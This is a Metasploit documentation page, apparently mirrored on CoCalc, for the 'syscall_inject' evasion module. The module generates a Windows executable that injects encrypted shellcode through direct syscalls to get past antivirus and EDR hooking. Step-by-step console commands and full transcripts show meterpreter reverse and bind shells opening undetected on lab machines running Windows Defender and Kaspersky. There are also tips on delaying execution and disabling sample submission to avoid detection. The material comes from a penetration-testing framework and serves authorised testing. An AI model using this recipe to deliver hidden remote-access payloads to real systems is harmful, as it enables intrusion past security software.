CoCalc -- syscall

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/evasion/windows/syscall_inject.md
Views: ¹⁹⁰⁴

Description

This module lets you create a Windows executable that injects a specific payload/shellcode in memory bypassing EDR/AVs Windows API hooking technique via direct syscalls achieved by Mingw's inline assembly. Mingw needs (x86_64) to be installed on the system and in the PATH environment variable.

The technique used is based on Sorting by System Call Address, by enumerating all Zw* stubs in the EAT of NTDLL.dll and then sorting them by address, it still works even if syscall indices were overwritten by AVs. For more details

Verification Steps

steps using a meterpreter/reverse_tcp payload on a 64-bits target:

use evasion/windows/syscall_inject
set LHOST <local IP>
set payload windows/x64/meterpreter/reverse_tcp
handler -p windows/x64/meterpreter/reverse_tcp -H <local IP> -P <local port>
run
Make sure that "Automatic Sample Submission" is off in Windows Defender
Copy the generated executable file to a specified location (e.g. target PC)
Run it
Verify that you got a session without being blocked by Antimalware

Options

CIPHER

Encryption algorithm used to encrypt the payload. Available ones (CHACHA, RC4)

FILENAME

Filename for the generated evasive file file. The default is random.

JUNK

Adding random data such as names, emails and GUIDs to the final executable

SLEEP

Specify how much the program sleeps in milliseconds prior to execute the shellcode's thread (NtCreateThread). NOTE: the longer the better chance to avoid being detected.

Advanced

OptLevel

Optimization level passed to the compiler (Mingw)

Scenarios

Windows 10 (x64) version 20H2 with Defender

msf6 > use evasion/windows/syscall_inject 
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/syscall_inject) > set SLEEP 10000
SLEEP => 10000
msf6 evasion(windows/syscall_inject) > set LHOST 192.168.1.104
LHOST => 192.168.1.104
msf6 evasion(windows/syscall_inject) > run

[+] pYlCSOAeW.exe stored at /Users/user/.msf4/local/pYlCSOAeW.exe
msf6 evasion(windows/syscall_inject) > cp  /Users/user/.msf4/local/pYlCSOAeW.exe ~
[*] exec: cp  /Users/user/.msf4/local/pYlCSOAeW.exe ~

msf6 evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter/reverse_tcp -H 192.168.1.104 -P 4444
[*] Payload handler running as background job 1.

[*] Started reverse TCP handler on 192.168.1.104:4444 
msf6 evasion(windows/syscall_inject) > [*] Sending stage (200262 bytes) to 192.168.1.103
[*] Meterpreter session 3 opened (192.168.1.104:4444 -> 192.168.1.103:53007) at 2021-08-01 17:08:43 +0300

msf6 evasion(windows/syscall_inject) > sessions -i 3 
[*] Starting interaction with 3...

meterpreter > sysinfo 
Computer        : DESKTOP-822593D
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.1.103 - Meterpreter session 3 closed.  Reason: User exit

Windows server 2012 (x64) with Kaspersky 10.2.6.3733

msf6 > use evasion/windows/syscall_inject
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 evasion(windows/syscall_inject) > set payload windows/x64/meterpreter_bind_tcp 
payload => windows/x64/meterpreter_bind_tcp
msf6 evasion(windows/syscall_inject) > set RHOST 192.168.225.76
RHOST => 192.168.225.76
msf6 evasion(windows/syscall_inject) > set LPORT 10156
LPORT => 10156
msf6 evasion(windows/syscall_inject) > set cipher rc4
cipher => rc4
msf6 evasion(windows/syscall_inject) > run

[+] ShP.exe stored at /Users/medicus/.msf4/local/ShP.exe
msf6 evasion(windows/syscall_inject) > cp /Users/medicus/.msf4/local/ShP.exe ~
[*] exec: cp /Users/medicus/.msf4/local/ShP.exe ~

msf6 evasion(windows/syscall_inject) > handler -p windows/x64/meterpreter_bind_tcp -H 192.168.225.76 -P 10156
[*] Payload handler running as background job 0.

[*] Started bind TCP handler against 192.168.225.76:10156
msf6 evasion(windows/syscall_inject) > [*] Meterpreter session 1 opened (0.0.0.0:0 -> 192.168.225.76:10156) at 2021-08-01 17:32:05 +0300

msf6 evasion(windows/syscall_inject) > sessions -i 1 
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer        : LABCE28
OS              : Windows 2012 (6.2 Build 9200).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 386
Meterpreter     : x64/windows
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.225.76 - Meterpreter session 1 closed.  Reason: User exit